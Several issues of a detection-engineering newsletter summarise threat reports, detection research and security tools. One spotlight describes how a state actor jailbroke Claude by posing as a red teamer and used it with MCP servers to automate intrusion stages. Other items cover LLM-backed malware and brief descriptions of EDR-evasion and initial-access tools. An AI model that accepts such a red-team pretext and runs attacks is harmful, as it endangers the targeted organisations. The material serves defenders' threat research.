This is a nice introductory post to leveraging threat intelligence in detections.ai to generate detection outcomes. Full transparency: the platform has sponsored this newsletter, but it also has a community edition, so folks can sign up to benefit.

One of the hardest problems in cyber threat intelligence that I’ve dealt with for 15 years is proving tangible value. This is different than intangible value. The delivery of finished intelligence reports, RFIs, and investigative platform experiences can be considered intangible. You miss these things when you don’t have them, but it’s hard to measure the “why” behind the impact of a report or an RFI.

Detection engineering helps bridge this gap, specifically by enabling cyber threat intelligence teams to turn their research into tangible outcomes. This is what Pomeroy argues LLMs can do. You can feed an agent a cyber threat intelligence report, it can parse IOCs, TTPs, and log sources, and it can generate rules for you to try out and deploy to get up-to-date coverage of emerging threats.

Introducing LUMEN: Your EVTX Companion by Daniel Koifman

This is the release blogpost for Daniel Koifman’s LUMEN project, located at https://lumen.koifsec.me/. It’s a free tool for investigators and incident responders to load Windows evtx files for analysis. There are over 2,000 preloaded Sigma rules, and the entire analysis engine is run client-side. You can do several things once you load your logs in, such as running a sweep of the Sigma ruleset, building a dashboard on fired rules, building an attack timeline, and extracting IOCs. It has a feature to connect your favorite LLM platform to the tool using an API key and leveraging it for AI copilot capabilities.

☣️ Threat Landscape

Meet Rey, the Admin of ‘Scattered Lapsus$ Hunters’ by Brian Krebs

This is a classic Krebs doxing piece unveiling the identity of one of the main personas of The Com group, Scattered Lapsus$ Hunters. Rey was an administrator of one of the Com-aligned ransomware strains, ShinySp1d3r. It’s always crazy how he manages to pull the attribution thread to find these identities. An old message from Rey contained a joke screenshot of a scam email they received with a unique password. From there, he pivoted on the password to find more breach data tying Rey to a real person. Since Rey didn’t respond to him, Brian called his dad, and of course, Rey responded.

The Shai-Hulud 2.0 npm worm: analysis, and what you need to know by Christophe Tafani-Dereeper and Sebastian Obregoso

~ Note, I work at Datadog, and Christophe & Sebastian are my coworkers! ~

It’s rare to see the term worm inside a headline these days. It’s a rare label for a unique security phenomenon, and the idea still holds firm, this time targeting npm (again). The Datadog Security Research team put a lot of time and energy into their analysis of the latest Shai-Hulud wave. Some interesting notes from this campaign include using previous victims to post new victim data, a wiper component, and a clever local GitHub Actions persistence mechanism.

Inside the GitHub Infrastructure Powering North Korea’s Contagious Interview npm Attacks by Kirill Boychenko

Boychenko and the Socket Research team published their latest work on TTP updates to North Korea’s “Contagious Interview” campaign. It’s an impressive operation, given the scale they try to employ, aiming to conduct as many malicious interviews as possible. In this campaign, they tracked 100s of malicious packages, each with over 31,000 downloads. The factory-style setup of rolling new GitHub users with the malicious interview code, fake LinkedIn profiles, and rotating C2 servers is classic Contagious Interview.

Unmasking a new DPRK Front Company DredSoftLabs by Mees van Wickeren

To continue on the DPRK train, I found this post fascinating because it wasn’t about the malware associated with WageMole/Contagious Interview, but rather the techniques behind tracking infrastructure. Van Wickeren leveraged the reliable GitHub search engine to find malicious repositories linked to the campaign.

I was a little confused by their use of WageMole, only from a pure clustering nerd perspective. These look like Contagious Interview repositories, and the associated OSINT screenshots that call out some of them suggest that victims were taking malicious coding tests. WageMole, on the other hand, is a fake IT worker applying to companies.

At the end of the day it doesn’t matter too much because they all overlap, but its another demonstration of how hard it is to do attribution in this field.

🔗 Open Source

Koifman/LUMEN

Full LUMEN web-app from Daniel Koifman’s blog in State of the Art above. You can host your own LUMEN instance without ever leaving your localhost!

Vyntral/god-eye

Subdomain and attack surface enumeration tool that leverages local Ollama for AI analysis on top. It’ll connect to twenty different open-source scanning and directory services, like dnsdumpster, then push results into the local Ollama model. It looks intelligent enough to help with HTTP probing, CVE analysis, and sifting through Javascript code for anything leaked or vulnerable to standard web attacks.

R3DRUN3/magnet

Magnet leverages the GitHub API and specific query strings to find potential secrets posted to public repositories. You can specify strings or use ones provided by magnet. In their PoC, R3DRUN3 managed to find two repositories with leaked tokens, then responsibly reached out to them to provide remediation steps, and they responded.

ChiefGyk3D/pfsense-siem-stack

SIEM-in-a-box for pfSense firewalls. It has an impressive architecture: OpenSearch backend, parsers in Logstash and uses Grafana/InfluxDB for metrics. It looks like they’ll be extended the SIEM backend to other open-source SIEMs like Wazuh in the future.

RazviOverflow/advent-of-hacks

Awesome-* style list of hacking challenges for the holiday season. So far they have 8 listed, so if you wanted to spend some time this December to up your hacking and CTF knowledge you have your work cut out for you!

Detection Engineering Weekly
DEW #138 - Sigma's Detection Quality Pipeline, Anthropic finds AI-first APT & eBPF shenanigans 19 November 2025 at 14:03

DEW #138 - Sigma's Detection Quality Pipeline, Anthropic finds AI-first APT & eBPF shenanigans

Detection Engineering Weekly

By: Zack Allen

19 November 2025 at 14:03

Welcome to Issue #138 of Detection Engineering Weekly!

✍️ Musings from the life of Zack:

I switched to the Brave browser, and I don’t think I’m ever looking back
My coworker suggested I go to a Tottenham Hotspur match while I’m in London. I’m a fan of one of the most insane fanbases in the NFL, where we jump through folding tables set aflame before games, and I feel that same energy from the Spurs YouTube shorts I’m watching during my research
I fractured my rib 5 weeks ago and I’m finally back (carefully) training. It feels good to move again!

This Week’s Sponsor: Sublime Security

Tomorrow: Intro to MQL, Threat Hunting, and Detection in Sublime
We invite Detection Engineering Weekly subscribers to join a technical webinar that will guide you through how Sublime Security detects advanced email threats. Learn how MQL (Sublime’s native detection language), threat-hunting workflows, Lists, Rules, Actions, and Automations all contribute to a flexible detection pipeline.
Additionally, discover how our Autonomous Security Analyst (ASA) accelerates investigations.
Register today!

💎 Detection Engineering Gem 💎

SigmaHQ Quality Assurance Pipeline by Nasreddine Bencherchali

Many people claim to use detection-as-code, but I rarely see these pipelines discussed as transparently as those from SigmaHQ. In this post, Nasreddine provides readers with a complete overview of how Sigma’s community ruleset repository manages community contributions. Documentation is essential here: the Sigma team ensures that every community rule adheres to a specification, so they all appear the same, even down to the filename. Here’s their Linux rule specification:

I love the attention to detail here. When you have a ruleset of thousands of rules, you need to ensure consistency in every step of the detection engineering process. It may not matter to have these conventions when you are a single team managing dozens of rules, but when you are a five-person team managing 1000s, it makes the ruleset more attractive for others to use and also keeps you sane.

The coolest part here, IMHO, is the combination of benign and malicious log validation tests. Each rule in each pull request undergoes several validators, followed by a good-log test and regression testing. The good-log test takes candidate rules and runs them across the evtx-baseline repository. If a rule generates an alert, then it must be a false positive, and the pipeline fails.

Separately, the regression testing pipeline ensures that a change in the rules doesn’t introduce any regressions that could cause false negatives and forces submitters to contribute a sample of a malicious log to validate its usefulness. The maintainers may also request reference links to blogs, threat intelligence websites such as VirusTotal, and even malware sandboxes to ensure they understand the efficacy of the rule before merging.

🔬 State of the Art

Stopping kill signals against your eBPF programs by Neil Naveen

This post is an excellent study in the cat-and-mouse game of threat detection on Linux systems. For the most part, eBPF-style security agents are the de facto standard for telemetry inspectability and detection & response. We’ve seen a lot of research in this newsletter on how effective threat actors on Windows spend time trying to disable EDRs to go unnoticed during their operations. But, I have seen few, if any, research on how to protect against eBPF attacks on Linux until I read Naveen’s research here.

When you want to terminate an eBPF agent, you’ll need Administrator privileges to do so, as they run as Linux daemons. If someone did manage to get permissions, you could send a kill signal to the process and then Bob’s your uncle. But what if you wanted to add extra steps to collect even more telemetry and find a compromise? Naveen came up with two options:

Using eBPF to hook kill and never let anything kill it
Leveraging cryptographically signed nonces as an added layer of assurance to accept a kill signal, and to keep your sanity because you just locked yourself out from restarting the agent

I’ve been doing Linux development, both offensively and defensively, for over a decade. This is probably the first time I’ve seen a clever application of cryptography to give a defense-in-depth approach to Linux detection & response. Here’s Naveen’s workflow comparing and contrasting a standard public-private key setup to a nonce-based signature kill methodology:

Example signature flow from Naveen’s post

Of course, actors can also do fun stuff where they attack the Network stack directly and prevent the agent from reaching out to your security vendor’s domain for additional alerting.

Technique Research Reports: Capturing and Sharing Threat Research by Andrew VanVleet

This post serves as a follow-up to VanVleet’s research into detection data models (DDMs). DDMs are a form of documentation for detection engineers to help transcribe knowledge from an attack technique into actionable detection opportunities. But, there’s always more to a detection rule than the specific telemetry it’s trying to capture. This is where VanVleet introduces Technique Research Reports (TRRs).

The idea behind these reports is to capture the research knowledge surrounding the technique and rule. This is probably the most challenging part of our jobs, because individual research methodologies vary, and you may be an expert in a specific attack surface or style of attack, but it doesn’t do your team any favors if you can’t help them learn how you arrived to a rule. It’s even worse if you leave the team, and folks are left trying to understand the specifics of the attack, as well as the environmental context and the research you’ve performed.

I do see a lot of similarity with MITRE ATT&CK’s recent v18 launch, specifically Detection Strategies. “Identify possible telemetry” is, in general, where Detection Strategies stop and TRR reports begin. Log sources are environment-specific, and although you may have Sysmon, EDR, or syslog logs, they can become nuanced based on your environment setup. For example, a CrowdStrike vs. SentinelOne query will affect your log source query.

They are incredibly comprehensive write-ups, or “lossless” research reports, as VanVleet calls them. For example, the TRR for DCShadow attacks is a fantastic resource for detection engineers to understand the intricacies of a Rogue DC attack. It can be a blog post in its own right. However, this is where the tradeoff between documentation quality and the velocity of maintaining a ruleset comes into play.

I love this research, but given how much valuable time he invested in it, it may not be conducive to productivity unless your leadership time allows you to do so. I also worry about drift in techniques and telemetry sources, which can make some of these outdated. LLMs could help solve some of this because they are generally very good at parsing and maintaining knowledge bases.

Weird Is Wonderful by Matthew Stevens

This is a short-but-sweet commentary on the role of detection engineers and how we need to “catch the weird.” It’s always nice for me to see fresh takes on concepts I’ve talked and read about for years. When folks try to break into this industry, they are sometimes bombarded with extremely technical concepts, complex environments, and a wide array of technologies they must learn before they feel useful. But, sometimes, it’s nice to hear from others who can distill complicated subjects into easy-to-understand concepts.

Catching weird, to me, is the idea that we all succeed at our jobs when we can distinguish normal from malicious. Weird may not be malicious, so having some intuition around things that look off can help solidify the baseline of normal in your environment versus something not normal. It’s a professional paranoia, of sorts :).

Be KVM, Do Fraud by Grumpy Goose Labs / wav3

This is a follow-up post to Grumpy Goose Labs’ research on hunting for KVM switches to detect fraudulent employees. It’s full of Kim Jong-un memes, but there are excellent technical details around detecting KVM switches in your environment. The author, wav3, uses CrowdStrike as their example, and managed to dump a bunch of information on how to hunt indicators ranging from KVMs, Display settings and product indicators so you can see who among your workforce may employ some of these risky devices.

☣️ Threat Landscape

⚡ Emerging Threats Spotlight: Anthropic Disrupts First AI-Orchestrated Cyber Espionage Campaign

Disrupting the first reported AI-orchestrated cyber espionage campaign by Anthropic

Last week, the threat intelligence team at Anthropic disclosed the disruption of the “first-ever” AI-orchestrated espionage campaign by a Chinese Nexus threat actor. GTG-1002 is the designation for this threat cluster, and they attributed with high confidence to a Chinese state-sponsored operation. In this summary, I’ll break down the architecture and Anthropic’s analysis of the attack workflow, share my commentary on the parts of the report that I like and dislike, my medium-high confidence analysis of details missing from the report, and provide takeaways for detection engineers.

Attack Architecture

The most interesting aspect of this operation is that Anthropic had visibility into the orchestration layer of the threat activity, leveraging a combination of Claude and several MCP servers. They claim the threat group automated 80-90% of their operations autonomously, an impressive feat when you consider that this is a nation-state operation. GTG-1002 managed to jailbreak Claude into thinking it was talking to a red teamer, allowing them to instruct Claude to work on their behalf.

If you had told me last year that a nation-state would trust an AI system to execute its campaigns against victims, I would have (rudely) laughed in your face. But it looks pretty slick:

Architecture diagram pulled from the Anthropic report.

For those with a Model Context Protocol (MCP) server, it provides a standardized way to connect a human interface, such as chat or code editors, to external tools like APIs. AI applications like Claude can only use a small set of tools, so writing your own connectors to centralize your chat interface to whatever toolset you want is a powerful feature of these platforms.

According to Anthropic, GTG-1002 built a suite of MCP servers that connected to several open-source toolsets dedicated to performing reconnaissance and fingerprinting, exploitation, post-compromise lateral movement and discovery, and eventually, collection and exfiltration. This is the impressive part of the operation: imagine an operator leveraging a chat interface to create a scalable infrastructure for red team operations, with the “backend” attack tool system handled by Claude and capable of scaling as needed.

The team claims that with their visibility in Claude usage, the operators automated 80% to 90% of their attacks. The remaining 10%-20% involved human verification at the “Report & Analysis” step, as shown in the diagram above.

Attack Flow

Anthropic grouped their attack operations into five phases, as shown above. The “robot” in each phase serves as the MCP server, directing specific tools to perform tasks along the ATT&CK killchain. The human icon next to the robots indicates a manual validation step by a human. These pit stops serve as a verification step to make sure that Claude is behaving correctly and not hallucinating.

In the report, the validation steps did result in a myriad of hallucinations. They claim Claude returned incorrect results, non-existent credentials, and the wrong IP addresses. So, although the attack flow diagram shows a clean, step-by-step process for the attack phase, these operations were frequently rerun.

Pros & Cons

This report has received criticism from the security community since its publication. To me, it’s a landmark report and whether it’s a famous or infamous report, it has left it mark. I want to list both what I like and don’t like about it.

What I like:

There’s an excellent demonstration of the unique visibility the Anthropic team has over attack infrastructure. It’s certainly a threat intelligence source that we can derive useful insights from, and foundational model companies like Anthropic and OpenAI can provide that
There is a specific call out around responsible disclosure to victim organizations. It shows the good intentions of the security team at Anthropic, and I hope to see more of that in the future
They admit shortcomings around how the actors performed jailbreaking to get Claude Code to help them with their operations, as well as limitations in hallucinations
The transparent technical context around the threat model of AI Trust was helpful to see and understand their day-to-day challenges

What I didn’t like:

They did not provide any indicators of compromise. No IPs, domains, hashes, signatures, or payload examples. It’s hard for research teams to verify findings independently.
The attribution is vague, and it reads like Anthropic intentionally redacted proof around this activity. Indicators of compromise could help with this
It reads as if these attacks were cloud-based instead of on-premise. I couldn’t parse out if this was differentiated, but it doesn't matter when it comes to the severity of a Chinese-nexus APT cluster. The callout about attacks against databases, internal applications, and container registries makes me think this is a cloud environment

Overall, the report provides a net benefit to security teams on several fronts. The claim of an APT using modern AI architecture from Anthropic, rather than vendor marketing, is a step forward in our understanding of an evolving threat landscape. It builds trust in Anthropic’s security team, which is one of the most used platforms for foundational models today. If we got this report from another vendor, we’d question the efficacy of their security program.

I think the feedback is valid regarding the value of threat intelligence, but I only see them improving from here.

🔗 Open Source

tired-labs/techniques

Technique Research Report dataset from VanVleet’s work above. It has extensive documentation of several attack techniques, and they fit the style-guide he talked about in his blog. It also includes a link to a frontend searchable library for those who don’t want to navigate the GitHub repository.

ricardojoserf/SAMDump

Volume Shadow Copy technique leveraging internal Windows APIs versus the command line. When you run the binary, it won’t generate any traditional Sysmon telemetry leveraging vssadmin.exe, which arguably makes it harder to detect. It has a few other tricks, including using NT API and avoids GetProcAddress usage.

reconurge/flowsint

Open-source and graph-based OSINT tool that looks like a more modern take on Maltego. It has dozens of transforms, so you can get a good amount of functionality out of it to compete with Maltego. The differentiation here would be hosting something on your own, and if you require specific integrations, you’d have to build them yourself.

RootUp/git-fsmonitor

This is a fun initial access technique leveraging the fsmonitor capability of git clients. You edit the git configuration file and set the fsmonitor value to a shell script. When git is run, the shell script executes under the hood.

Detection Engineering Weekly
DEW #137 - AI Agents For Security By Security, Free Sigma training & JA4 for beginners 12 November 2025 at 14:28

DEW #137 - AI Agents For Security By Security, Free Sigma training & JA4 for beginners

Detection Engineering Weekly

By: Zack Allen

12 November 2025 at 14:28

Welcome to Issue #137 of Detection Engineering Weekly!

✍️ Musings from the life of Zack in the last week:

I was in LA for a wedding and went to Venice Beach for the first time. It was awesome seeing pros at the skatepark, jamskaters, live music, and of course, this ^^ MF DOOM mural
Speaking of LA, there are Waymos EVERYWHERE
It started snowing here in New England, and we celebrated by running outside barefoot for as long as my family could bare it

This Week’s Sponsor: Nebulock

Trust Your Intuition. Vibe Hunt for Outcomes.
Good hunters feel suspicious activity before the alert ever hits. Vibe Hunting allows you to lean into that intuition and combine it with machine reasoning to hunt across data and telemetry without juggling tools. Nebulock’s threat hunting agents connect the dots, explain reasoning, and deliver contextual recommendations.
Hunting becomes less about process and more about bridging hypotheses with detection.
Start Vibe Hunting

💎 Detection Engineering Gem 💎

How Google Does It: Building AI agents for cybersecurity and defense by Anton Chuvakin and Dominik Swierad

I typically avoid including blogs from vendors that are high level concepts around complicated topics like security and AI. But, this blog struck a great balance between how they approached internal Google security engineers who were skeptic of leveraging AI in their day-to-day work. I think this approach can be copied for any security organization looking to augment their security operations with LLMs, as it focuses on small achievable wins grounded in risk reduction and reality versus “thinking big.”

Chuvakin and Swierad split this approach up into four steps:

Hands-on learning builds trust: You wouldn’t want to purchase a SIEM without having your Detection & Response team understand how to use it, so why do the same thing with agentic systems?
Prioritize real problems, not just possibilities: Ground your agentic problems in a space where you are already familiar with the problems. They list two prime examples every D&R engineer could use to help with: analyzing large swaths of security data into insights, and quickly triaging malicious code to understand its function
Measure, evaluate, and iterate to scale sucessfully: This section uses the dirty word/acronym “KPI” (cringes in business school). Instead, they gut-check success by asking two critical questions: “Did this meaningfully reduce risk?” and “What amount of repetitive tasks did this automate and free up capacity?”
Get your foundations right: This is the most nuanced section that carries the most value for folks to steal. When you develop agentic systems, stick to simplicity on the particular task you need the agent to do. Agents aren’t security engineers, they are containerized experts in a small subset of tasks. Ensure they are proficient in these tasks, because what makes them powerful is how you connect them together.

The way I see this working for years to come is that we’ll have agentic workflows handle the “80%” work, such as repetitive tasks or analysis. The “20%” work that requires a ton of focus will be traditional expert work that we know and love. This split still requires us to have deep expertise in our field, but I worry about the value of learning from the more boring or tedious work.

🔬 State of the Art

Detection Stream Sigma Training Playground by Kostas Tsialemis

Tsialemis, a long-time contributor to the detection engineering research space and a multi-time featured author on this newsletter, just published a free Sigma training playground for detection engineers. His associated blog post goes over the platform in detail, but it’s like a CTF for writing rules. There are some cool features which include interactive challenges, responsive feedback to the challenges, and the ability to write your own challenges and contribute them to the community.

A leaderboard always motivates me, too. #8 as of 10 November!

Mistrusted Advisor: Evading Detection with Public S3 Buckets and Potential Data Exfiltration in AWS by Jason Kao

Trusted Advisor is a free service from AWS that helps scan customer infrastructure for misconfigured security and resilience resources. One resource it helps find misconfigurations for is in S3 buckets, which have led to massive security incidents and breaches like those at Capital One and Twitch. So, if you can find a 0-day bypass to a security system like this, it can give an attacker the ability to evade defenses in your cloud accounts. And it appears that is what Kao and the Fog Security team did.

The basic premise behind this attack is setting an insecure policy that would generate an alert from Trusted Advisor, but explicitly denies three actions Trusted Advisor uses for the check.

So the insecure policy statement are lines 4-10, while the bypass occurs in a separate statement on lines 11-17. As it turns out, even AWS can get IAM wrong! Basically, the check failed close here and reported nothing was wrong, where the behavior should be failed open in cases where it can’t receive the telemetry to make an assessment.

The team submitted the security disclosure to AWS, and they fixed it after two tries. It also looks like Fog Security wasn’t happy with how AWS’ publicly disclosed the issue, as it contained an inaccuracy in a non-existent action that the hyperscaler fixed.

All you need to know about JA3 & JA4 Fingerprints (and how to collect them) by Gabriel Alves

This piece is an easy-to-understand introduction to the powerful TLS fingerprinting algorithms, JA3 & JA4. With TLS everywhere, the underlying Application Layer traffic has become much harder to analyze for potential security indicators. You could set up TLS termination, but there’s a large cost associated with building that infrastructure, and decrypting and inspecting traffic also leads to compliance issues.

The JA* algorithms solve this by building fingerprints of the unique characteristics of TLS handshakes. Virtually every implementation of TLS in code has its own quirks and intricacies that make it unique. When you add more infrastructure on top of that, it can be a powerful tool to cluster traffic in ways to identify malware families, hosting infrastructure or bots.

Alves provides readers with some great visuals to understand these unique fingerprints and utilizes the most powerful security tool in existence, Wireshark, to do so.

Agentic Detection Creation: From Sigma to Splunk Rules (or any platform) by Burak Karaduman

I’m seeing more blog posts leveraging agentic workflow platforms to build detection content, and I’m all for it. At this point in our journey in detection engineering, I don’t see why you wouldn’t have agentic rule writing to assist you. Here’s why:

MITRE ATT&CK serves as a rich knowledge base of tradecraft references that we all fundamentally agree is the standard
Telemetry sources are well documented, and the startup cost of booting up an environment for testing is decreasing more and more
Threat intelligence companies and blogs help piece together attack chains that you can generalize
Sigma serves as a universal language that forces rule content structure and documentation, and has a rich library of converters to your SIEM of choice
Detection as code pipelines serve as a quality gate for human review and for testing
SIEM APIs have capabilities to ingest a candidate rule and make sure it’s valid in its native language

Karaduman’s approach here follows the pattern I listed above, and it’s functionally sound. It follows a lot of the fundamentals of the detection engineering lifecycle. The agents take ideation as an input, and continuously research, design, and validate candidate rules. Once the Sigma rule is created, Karaduman leverages sigconverter.io to translate the rule into SPL and has a separate SPL validation agent to make sure it can run in production.

It’s a clever setup with several “smaller” agents performing tasks, which looks to be the optimal setup for this agent-to-agent workflow. I’m impressed at the simplicity of their architecture, and they were kind enough to include the fully visualized n8n workflow for readers to experiment with.

Can you guess what the most crucial step is here? The red box of course! It compiles every piece of documentation in the rule, validates it against Claude’s Sonnet 4.5 model, generates a report and messages the hypothetical detection engineer in email and on Teams.

☣️ Threat Landscape

GTIG AI Threat Tracker: Advances in Threat Actor Usage of AI Tools by Google Threat Intelligence Group

Unlike the cyberslop post from last week, where researchers at MIT made some bold claims on AI usage by ransomware operators, Google’s intelligence group brings the receipts on threat actor usage of LLM tools during operations.

I quite like the coining of “just-in-time” malware leveraged by two families they track as PROMPTFLUX and PROMPTSTEAL. These both generate malicious code on demand, and it looks like a multi-agent step that creates the code and obfuscates it during malware execution.

U.S. Nationals Indicted for BlackCat Ransomware Attacks on Healthcare Organizations by Steve Alder

Two American security professionals were indicted for allegedly working as initial access brokers for BlackCat ransomware. This is a wild story: they both worked for a threat intelligence company named DigitalMint, conducting RANSOMWARE NEGOTIATIONS on behalf of victims. Talk about insider threat, right?

In a classic case of insider threat motives, the main conspirator was in debt and went into business with BlackCat to help relieve that debt. This is a common tactic employed by spy agencies, so, logically, it would also work for criminal gangs.

Ex-L3Harris Cyber Boss Pleads Guilty to Selling Trade Secrets to Russian Firm by Kim Zetter

Is it insider threat week? It feels like insider threat week. Zetter reports of a man who was arrested and found guilty via a plea deal for selling trade secrets to an “unnamed Russian software broker”. The accused worked for L3Harris Trenchant, a U.S.-based developer of zero-day and exploitation tools, and earned over seven figures in the process.

Interview with the Chollima V by Mauro Eldritch, Ulises, and Sofia Grimaldo

This series by the Bitso Quetzal team highlights their research (and shenanigans) with live interviewing DPRK IT Workers. The interesting part of this interview, and potentially a change in WageMole's TTPs, is that they are interviewing and recruiting collaborators to conduct interviews on behalf of WageMole. There were early reports of this happening, but Grimaldo, Ulises, and Eldritch brought receipts in the form of chat logs, Zoom screenshots, and LinkedIn profiles.

LANDFALL: New Commercial-Grade Android Spyware in Exploit Chain Targeting Samsung Devices by Unit 42

LANDFALL is a Samsung Android-based spyware family discovered by Unit 42 researchers. They found this family while hunting for exploit chains related to the DNG processing exploit that Apple disclosed earlier this year. DNG is a file format that both Android and iOS can process, and it’s within this processing logic that the vulnerability and subsequent exploit chain exist.

It’s pretty neat how the Unit 42 team came across this malicious file: they were hunting for DNGs to replicate the iOS exploit and found one that had a Zip file appended to it, but was exploiting Samsung’s recently patched vulnerability from earlier this year. The team pulled apart the malicious DNG, found two .so files and mapped out the command and control network associated with it.

🔗 Open Source

OSINTI4L/Paper-Pusher

A Bash script for sending spam to WiFi-connected printers over LAN.

😭😭😭

karlvbiron/MAD-CAT

MAD-CAT is a chaos engineering tool that implements data wiping and corruption attacks against databases to simulate database failures and data wiping-style attacks for detection engineers. It supports six database technologies: MongoDB, Elasticsearch, Cassandra, Redis, CouchDB, and Apache Hadoop.

FoxIO-LLC/ja4

JA4 TLS fingerprinting library referenced in Alves’ post above. I’ve linked JA4 before, but it’s a seriously effective tool to add to detection arsenals, especially if you can instrument it in publicly accessible servers.

EvilBytecode/NoMoreStealers

A Windows minifilter driver that blocks filesystem access to specific file paths to prevent infostealers. The hardcoded paths it protects include browser secret data, cryptocurrency wallets and secrets, and chat applications.

Idov31/EtwLeakKernel

Event Tracing for Windows (ETW) consumer that requests stack traces to leak Kernel addresses. This can help with exploit development if you need to exploit a Kernel vulnerability and require base addresses, potentially defeating ASLR.

Detection Engineering Weekly
DEW #136 - ATT&CK V18 deep dive, Cyberslop @ MIT & Aisuru repurposes to residential proxies 5 November 2025 at 14:03

DEW #136 - ATT&CK V18 deep dive, Cyberslop @ MIT & Aisuru repurposes to residential proxies

Detection Engineering Weekly

By: Zack Allen

5 November 2025 at 14:03

Welcome to Issue #136 of Detection Engineering Weekly!

✍️ Musings from the life of Zack in the last week:

I’m trying something different here and performing a deeper analysis on content where I think it matters for y’all. It won’t happen often, but whether it’s a Gem or a piece of Threat Landscape news, I want to give you all my take beyond what you normally see, especially if it’s a story I’m particularly passionate about!
I just hit my 4-year anniversary at Datadog, so time is flying by. My 3-year anniversary for the newsletter is in a few weeks and it feels wild thinking about doing this for 36 months.
I stole every adult-sized candy bar from my kids at Halloween, and I didn’t think twice about it.

This Week’s Sponsor: Hack The Box

Your Tools Don’t Defend. Your People Do.
Threats evolve faster than your tech stack. Hack The Box keeps your teams ahead of attackers with hands-on, continuous upskilling that powers real Continuous Threat Exposure Management (CTEM).
Equip your people with the skills to validate, prioritize, and respond effectively and build the true resilience that keeps your organization ready for whatever comes next.
Get Your Team Started

💎 Detection Engineering Gem 💎

ATT&CK v18: The Detection Overhaul You’ve Been Waiting For by Amy L. Robertson

New ATT&CK version drops always deserve a feature in this newsletter, and I’m very pleased to see the changes in v18!

There are several techniques and procedures added to the ATT&CK arsenal, but I’d like to focus my analysis on the usefulness behind Detection Strategies for detection ideation and tuning.

Detection Strategies

The new version shipped a large change in how ATT&CK approaches detections via Detection Strategies. I wrote about this in Issue 121, but the common gap with ATT&CK is linking a technique or procedure to detection guidance. Through the use of STIX Domain Objects, defenders can now leverage these detection opportunities via machine-readable data, rather than relying on freeform text. Here’s an example leveraging Scheduled Task/Job Abuse:

I used Linux as an example here. You have three data components associated with finding scheduled job attacks. Each of these components has a log source name and channel. So, for line 6 (DC0061), you can use auditd syscall monitoring and look for writes and renames of cron files. The mutable elements part helps with detection tuning, and this can be everything from frequency analysis to environmental context, such as unusual users scheduling jobs.

Enterprise Updates & ESXi Detection Strategy Example

The team added several new tactics, and there seems to be a big push on cloud-native technologies. For example, adding the Container CLI or API (in the case of Kubernetes) is a great step to capturing how threat actors are moving away from on-prem technologies but using similar techniques to move through the kill-chain.

Local Storage Discovery, for example, highlights typical discovery tradecraft for finding interesting volumes on a victim machine. But there’s nuance here with whether you are on a cloud server, Windows host, or a Hypervisor. Looking at the Detection Strategy DET0188, a detection engineer can switch between Analytics platforms and perform their own testing based on the data components and channels. Now let’s work through tuning, and I’ll pick on this Sigma rule, ESXi Storage Information Discovery Via ESXCLI.

Nas’ and Maurugeon’s rule successfully implements the Data Component → Name → Channel analytic, but the rule may be broader (high recall) and requires tuning. If you study the Mutable Elements table, you can scope this rule down to restricting alerts based on ssh_source_ip being from outside your perimeter, or by tuning the esxcli_command_scope. Let’s tune via the command scope.

Reading the developer portal for esxcli, and with a bit of help from Claude, the command scope namespace looks like the following:

Lines 40-42 could be potential tuning updates to the Sigma rule to make it more precise. This would obviously need some testing, but moving from Analytic → Sigma Rule → ESXi command line documentation (thanks, Claude) to tuning was much easier.

For a deep dive into this type of detection research, check out Nathan Burns’ blog on the topic, which I posted in Issue 100 as a Gem.

Why is this important?

In my example, I walked through a tuning opportunity for ESXi. I’m not an ESXi expert, but I have good knowledge of Linux threat detection and MITRE ATT&CK. The Detection Strategy quickly oriented me to understand core detection opportunities, but also provided tuning ideas for broad to precise esxcli commands to alert on. Additionally, it took it a step further with SSH source IP environment hardening.

The ATT&CK knowledge base can now serve more than just a reference table for techniques. You can dive into each technique, get relevant examples for threat actors, and it points you to strategies with specific data sources and channels to alert on. It cuts down the time I would spend on Googling or setting up environments to smash my head on the keyboard until I get the right logging configuration to generate the alert telemetry.

☣️ Threat Landscape

CyberSlop — meet the new threat actor, MIT and Safe Security by Kevin Beaumont

This new series by Kevin Beaumont revolves around a new term he coined, “CyberSlop.” The definition I’ve gleaned from his writing is taking traditional FUD marketing techniques in cybersecurity and leveraging trusted institutions (like MIT in this story) to make AI-threat claims even more credible, especially through research papers and blog posts that lack evidence.

The story in this first edition revolves around a bold claim by MIT researchers in a paper that 80% of ransomware gangs use AI in their operations. After digging into the paper and publicly calling it out, it disappeared from the MIT website. Two of the authors are from Safe Security, a cybersecurity startup. As it turns out, the principal MIT researcher is on their board, with no disclosure of this conflict of interest in the paper.

Aisuru Botnet Shifts from DDoS to Residential Proxies by Brian Krebs

DDoS-for-hire botnets don’t pay enough to criminals who run them. At the end of the day, it's an inconvenience that sites suffer, and the Googles and Cloudflares of the world have gotten so good at soaking traffic, making me think they are even more irrelevant than before.

Residential proxies, on the other hand, are where money CAN be made. And this piece on the Aisuru botnet, a DDoS-for-hire botnet turned into residential proxy provider, is a good breakdown of these intricacies. In this post, Krebs exposes a web of proxy services, parent companies and the grayhat style recruitment they have of unsuspecting devices to build their new-age botnet.

Ukrainian National Extradited from Ireland in Connection with Conti Ransomware by U.S. Department of Justice

The U.S. DoJ extradited a suspected Conti member residing in Ireland. Lytvynenko was first arrested in 2023 at the request of the FBI, and has been facing extradition proceedings since then. There are some wild numbers cited in this report, which highlight the prolific nature of Conti. Lytvynenko is accused of extorting $150 million in ransomware payments from Conti victims alone.

SesameOp: Novel backdoor uses OpenAI Assistants API for command and control by Microsoft Incident Response

This is the first threat report I’ve read where a threat group leverages OpenAI as a C2 channel. SesameOp is the name of a new malware family by Microsoft Incident Response which uses OpenAI’s now-deprecated and slated-for-removal next year Assistant API. The malicious DLL queries the Assistant API vector store to find infected hostnames and then leverages the Assistant’s description field to execute a command.

The vector store part here is interesting because I imagine it makes detecting abuse much more challenging for security teams at OpenAI. You can typically scan platforms for victim or malicious domains, but do you now need to scan every vector store for the same thing?

A new breed of analyzers by Daniel Stenberg

Stenberg, the creator and head maintainer of cURL, triages and patches numerous security vulnerability submissions. In the before AI times, these submissions were (mostly) done by humans with some level of automated slop from fuzzers. Since then, a large number of LLM-generated slop submissions have burdened the cURL team.

It was cool seeing this update almost as a Part 2 of the post I linked. AI-backed vulnerability discovery and submission platforms are getting much better, especially those that have venture capital behind them, rather than a “researcher” running some LLM locally to find security weaknesses.

🔗 Open Source

kas-sec/version.dll-sideloading

Neat proof of concept abusing OneDrive.exe and DLL sideloading to gain execution in the OneDrive process. Once it gains execution, the malware registers exception hooks via Vectored Exception Handling (VEH) to bypass EDR detection. The registered exception handler hopefully avoids being hooked by the EDR process so you can evade detection.

